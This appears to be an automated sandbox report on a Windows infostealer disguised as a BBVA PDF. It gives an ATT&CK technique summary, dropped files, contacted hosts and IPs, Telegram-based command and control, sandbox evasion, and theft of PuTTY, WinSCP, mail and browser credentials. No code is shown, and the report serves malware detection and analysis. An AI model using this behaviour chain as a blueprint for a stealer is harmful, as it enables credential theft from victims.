            Discovery: 2 File and Directory Discovery; 13 System Information Discovery; 21 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Network Configuration Discovery; System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Command and Control: 1 Web Service; 2 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
            Behavior Graph (text rendering of the graph figure; the numbers after a process name are the graph's counters as rendered)

            Behavior Graph ID: 1629827
            Sample: BBVA-P53269 .pdf.exe
            Startdate: 05/03/2025
            Architecture: WINDOWS
            Score: 100

            Start
              Domains contacted: api.telegram.org; showip.net; alcomax.com.co
              Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 11 other signatures
              Started: wscript.exe 1; BBVA-P53269 .pdf.exe 15 5

            api.telegram.org
              Signature: Uses the Telegram API (likely for C&C communication)

            wscript.exe
              Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Started: AllData.exe 14 2

            BBVA-P53269 .pdf.exe
              Network: alcomax.com.co 204.44.192.90, 443, 49704, 49772 ASN-QUADRANET-GLOBALUS Canada
              Dropped: C:\Users\user\AppData\Roaming\AllData.exe, PE32; C:\Users\user\AppData\Roaming\...\AllData.vbs, ASCII
              Signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Started: InstallUtil.exe 26

            AllData.exe
              Signature: Multi AV Scanner detection for dropped file
              Started: InstallUtil.exe 84

            InstallUtil.exe (started by BBVA-P53269 .pdf.exe)
              Network: api.telegram.org 149.154.167.220, 443, 49915, 49936 TELEGRAMRU United Kingdom; showip.net 162.55.60.2, 49716, 49793, 80 ACPCA United States
              Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access)

            InstallUtil.exe (started by AllData.exe)
              Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
